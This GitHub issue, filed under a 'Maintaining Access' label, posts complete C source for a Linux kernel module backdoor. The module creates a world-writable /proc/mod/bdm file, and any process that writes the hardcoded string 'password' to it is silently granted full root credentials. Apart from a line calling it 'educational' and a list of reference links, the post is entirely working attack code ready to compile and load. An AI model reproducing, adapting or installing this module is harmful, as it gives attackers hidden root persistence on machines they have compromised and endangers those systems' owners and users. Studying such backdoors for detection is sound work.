Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[Maintaining Access] Linux Kernel Backdoor #28

Open
nixawk opened this issue Apr 28, 2018 · 0 comments
Open

[Maintaining Access] Linux Kernel Backdoor #28

nixawk opened this issue Apr 28, 2018 · 0 comments
Labels
add Maintaining-Access

Comments

@nixawk
Copy link
Owner

nixawk commented Apr 28, 2018
edited
Loading

linux-kernel-backdoor

#include <linux/module.h>
#include <linux/uaccess.h>
#include <linux/proc_fs.h>
#include <linux/cred.h>
#include <linux/slab.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("security");
MODULE_DESCRIPTION("Just for educational purpose");

#define KERN_PERMBITS 0666   // permission bits -> /proc/mod/bdm
#define KERN_PROCROOT "mod"
#define KERN_PROCFILE "bdm"
#define KERN_PASSWORD "password"

static ssize_t mymodule_write(struct file *, const char __user *, size_t, loff_t *);
static ssize_t mymodule_read(struct file *, char __user *, size_t, loff_t *);
static int mymodule_open(struct inode *, struct file *);
static int mymodule_procfs_attach(void);
static int __init mymodule_init(void);
static void __exit mymodule_exit(void);

static struct proc_dir_entry *proc_root;
static struct proc_dir_entry *proc_file;
static const struct file_operations proc_fops = {
        .open= mymodule_open,
        .read= mymodule_read,
        .write = mymodule_write,
};

static ssize_t
mymodule_write(struct file *file, const char __user *buffer, size_t count, loff_t *data)
{
        struct cred *cred;
        char *kbuf;
        int ret;

        if (count < 1)
                return -EINVAL;

        kbuf = kmalloc(count, GFP_KERNEL);
        if (!kbuf)
                return -ENOMEM;

        ret = copy_from_user(kbuf, buffer, count);
        if (!ret)
        {
                if(!strncmp(KERN_PASSWORD,(char*)kbuf, strlen(KERN_PASSWORD))){
                        cred = prepare_creds();
                        if (cred != NULL)
                        {
                                cred->uid = GLOBAL_ROOT_UID;
                                cred->gid = GLOBAL_ROOT_GID;
                                cred->suid = GLOBAL_ROOT_UID;
                                cred->euid = GLOBAL_ROOT_UID;
                                cred->euid = GLOBAL_ROOT_UID;
                                cred->egid = GLOBAL_ROOT_GID;
                                cred->fsuid = GLOBAL_ROOT_UID;
                                cred->fsgid = GLOBAL_ROOT_GID;
                                commit_creds(cred);
                        }
                        printk(KERN_WARNING "Module is installed successfully\n");
                }
        }

        kfree(kbuf);
        return count;
}

static ssize_t
mymodule_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
{
        return 0;
}

static int
mymodule_open(struct inode *inode, struct file *file)
{
        return 0;
}

static int
mymodule_procfs_attach(void)
{
        proc_root = proc_mkdir(KERN_PROCROOT, NULL);
        proc_file = proc_create(KERN_PROCFILE, KERN_PERMBITS, proc_root, &proc_fops);

        printk(KERN_INFO "proc_create successfully\n");

        if (IS_ERR(proc_file)){
                printk(KERN_ERR "proc_create failed\n");
                return -1;
        }
        return 0;
}

static int
__init mymodule_init(void)
{
        int ret;

        printk(KERN_INFO "module __init\n");

        ret = mymodule_procfs_attach();
        if(ret){
                printk(KERN_INFO "module __init failed\n ");
        }
        return ret;
}

static void
__exit mymodule_exit(void)
{
        printk(KERN_INFO "module __exit\n");

        remove_proc_entry(KERN_PROCFILE, proc_root);
        remove_proc_entry(KERN_PROCROOT, NULL);
}

module_init(mymodule_init);
module_exit(mymodule_exit);

// References
// https://elixir.bootlin.com/linux/v4.0/source/fs/proc/generic.c#L523
// https://github.com/rapid7/metasploit-framework/issues/6869
// https://github.com/allwinner-zh/linux-3.4-sunxi/blob/bd5637f7297c6abf78f93b31fc1dd33f2c1a9f76/arch/arm/mach-sunxi/sunxi-debug.c#L41
// https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10225
// https://memset.wordpress.com/2010/12/28/syscall-hijacking-simple-rootkit-kernel-2-6-x/
// https://wiki.archlinux.org/index.php/Kernel_module
// https://www.cyberciti.biz/faq/linux-how-to-load-a-kernel-module-automatically-at-boot-time/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
add Maintaining-Access
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@nixawk